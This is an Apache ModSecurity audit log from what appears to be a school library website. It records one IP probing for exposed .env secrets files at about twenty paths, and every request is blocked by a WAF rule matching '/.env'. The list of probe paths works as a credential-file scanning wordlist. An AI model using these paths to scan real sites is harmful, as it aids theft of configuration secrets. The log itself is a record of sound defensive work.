Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65b2e310-Z-- --8c102968-A-- [06/Jun/2025:05:50:01 +0700] aEIfGdKrQJH3faNNWWAXCQAAAM4 103.236.140.4 48208 103.236.140.4 8181 --8c102968-B-- GET /laravel/.env.staging HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236193 --8c102968-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8c102968-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163801043517 639 (- - -) Stopwatch2: 1749163801043517 639; combined=249, p1=223, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c102968-Z-- --d580841d-A-- [06/Jun/2025:05:50:01 +0700] aEIfGdKrQJH3faNNWWAXCgAAANI 103.236.140.4 48212 103.236.140.4 8181 --d580841d-B-- GET /laravel/core/.env.local HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412808 --d580841d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d580841d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163801224270 698 (- - -) Stopwatch2: 1749163801224270 698; combined=280, p1=247, p2=0, p3=0, p4=0, p5=32, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d580841d-Z-- --997c6667-A-- [06/Jun/2025:05:50:01 +0700] aEIfGdKrQJH3faNNWWAXCwAAANQ 103.236.140.4 48216 103.236.140.4 8181 --997c6667-B-- GET /laravel/core/.env.production HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236196 --997c6667-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --997c6667-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163801405403 694 (- - -) Stopwatch2: 1749163801405403 694; combined=278, p1=245, p2=0, p3=0, p4=0, p5=32, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --997c6667-Z-- --9a68b072-A-- [06/Jun/2025:05:50:01 +0700] aEIfGWaFzeU7VUj_TDFz0AAAABY 103.236.140.4 48220 103.236.140.4 8181 --9a68b072-B-- GET /laravel/core/.env.staging HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412811 --9a68b072-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9a68b072-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163801586610 681 (- - -) Stopwatch2: 1749163801586610 681; combined=258, p1=228, p2=0, p3=0, p4=0, p5=29, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a68b072-Z-- --4efb6453-A-- [06/Jun/2025:05:50:01 +0700] aEIfGeJsrKcXA4Tjex0GjgAAAE4 103.236.140.4 48224 103.236.140.4 8181 --4efb6453-B-- GET /main/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236199 --4efb6453-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4efb6453-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163801767623 757 (- - -) Stopwatch2: 1749163801767623 757; combined=321, p1=288, p2=0, p3=0, p4=0, p5=32, sr=117, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4efb6453-Z-- --66588b44-A-- [06/Jun/2025:05:50:01 +0700] aEIfGdKrQJH3faNNWWAXDAAAANY 103.236.140.4 48228 103.236.140.4 8181 --66588b44-B-- GET /node_modules/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412814 --66588b44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --66588b44-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163801948593 769 (- - -) Stopwatch2: 1749163801948593 769; combined=300, p1=267, p2=0, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66588b44-Z-- --aa038b31-A-- [06/Jun/2025:05:50:03 +0700] aEIfG-JsrKcXA4Tjex0GkgAAAFM 103.236.140.4 48234 103.236.140.4 8181 --aa038b31-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236209 --aa038b31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --aa038b31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163803222242 939 (- - -) Stopwatch2: 1749163803222242 939; combined=382, p1=342, p2=0, p3=0, p4=0, p5=40, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa038b31-Z-- --9a68b072-A-- [06/Jun/2025:05:50:03 +0700] aEIfG-JsrKcXA4Tjex0GkwAAAFQ 103.236.140.4 48248 103.236.140.4 8181 --9a68b072-B-- GET /app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412825 --9a68b072-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9a68b072-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163803403674 764 (- - -) Stopwatch2: 1749163803403674 764; combined=275, p1=246, p2=0, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a68b072-Z-- --910cb443-A-- [06/Jun/2025:05:50:03 +0700] aEIfG9KrQJH3faNNWWAXDQAAANg 103.236.140.4 48252 103.236.140.4 8181 --910cb443-B-- GET /.env.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236212 --910cb443-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --910cb443-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163803584769 672 (- - -) Stopwatch2: 1749163803584769 672; combined=260, p1=229, p2=0, p3=0, p4=0, p5=30, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --910cb443-Z-- --55b77514-A-- [06/Jun/2025:05:50:03 +0700] aEIfG9KrQJH3faNNWWAXDgAAAME 103.236.140.4 48256 103.236.140.4 8181 --55b77514-B-- GET /.env.example HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412828 --55b77514-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --55b77514-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163803765362 698 (- - -) Stopwatch2: 1749163803765362 698; combined=261, p1=228, p2=0, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55b77514-Z-- --33e9633b-A-- [06/Jun/2025:05:50:03 +0700] aEIfG9KrQJH3faNNWWAXDwAAAMQ 103.236.140.4 48260 103.236.140.4 8181 --33e9633b-B-- GET /.env.local HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236215 --33e9633b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --33e9633b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163803946136 684 (- - -) Stopwatch2: 1749163803946136 684; combined=278, p1=245, p2=0, p3=0, p4=0, p5=32, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33e9633b-Z-- --b2de145f-A-- [06/Jun/2025:05:50:04 +0700] aEIfHNKrQJH3faNNWWAXEAAAAMU 103.236.140.4 48264 103.236.140.4 8181 --b2de145f-B-- GET /.env.old HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412831 --b2de145f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b2de145f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163804126767 669 (- - -) Stopwatch2: 1749163804126767 669; combined=251, p1=219, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2de145f-Z-- --841d4f1b-A-- [06/Jun/2025:05:50:04 +0700] aEIfHNKrQJH3faNNWWAXEQAAAMk 103.236.140.4 48268 103.236.140.4 8181 --841d4f1b-B-- GET /.env.prod HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236218 --841d4f1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --841d4f1b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163804307681 658 (- - -) Stopwatch2: 1749163804307681 658; combined=252, p1=220, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --841d4f1b-Z-- --a7cadc58-A-- [06/Jun/2025:05:50:04 +0700] aEIfHNKrQJH3faNNWWAXEgAAAMo 103.236.140.4 48272 103.236.140.4 8181 --a7cadc58-B-- GET /.env.production.local HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412834 --a7cadc58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a7cadc58-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163804488384 728 (- - -) Stopwatch2: 1749163804488384 728; combined=310, p1=278, p2=0, p3=0, p4=0, p5=32, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7cadc58-Z-- --1a993a46-A-- [06/Jun/2025:05:50:04 +0700] aEIfHPHwHPygw9BuFzQ1vwAAAIU 103.236.140.4 48276 103.236.140.4 8181 --1a993a46-B-- GET /.env.stage HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236221 --1a993a46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1a993a46-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163804669169 717 (- - -) Stopwatch2: 1749163804669169 717; combined=293, p1=257, p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a993a46-Z-- --a78d8a2f-A-- [06/Jun/2025:05:50:04 +0700] aEIfHNKrQJH3faNNWWAXEwAAAMs 103.236.140.4 48280 103.236.140.4 8181 --a78d8a2f-B-- GET /admin/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412837 --a78d8a2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a78d8a2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163804849956 685 (- - -) Stopwatch2: 1749163804849956 685; combined=283, p1=249, p2=0, p3=0, p4=0, p5=34, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a78d8a2f-Z-- --32252111-A-- [06/Jun/2025:05:50:05 +0700] aEIfHdKrQJH3faNNWWAXFAAAAM8 103.236.140.4 48284 103.236.140.4 8181 --32252111-B-- GET /api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236224 --32252111-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --32252111-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163805030873 696 (- - -) Stopwatch2: 1749163805030873 696; combined=281, p1=249, p2=0, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32252111-Z-- --b1f7d14e-A-- [06/Jun/2025:05:50:05 +0700] aEIfHdKrQJH3faNNWWAXFQAAANA 103.236.140.4 48288 103.236.140.4 8181 --b1f7d14e-B-- GET /apps/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412840 --b1f7d14e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b1f7d14e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163805211812 29224 (- - -) Stopwatch2: 1749163805211812 29224; combined=57243, p1=250, p2=0, p3=0, p4=0, p5=28540, sr=79, sw=1, l=0, gc=28452 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
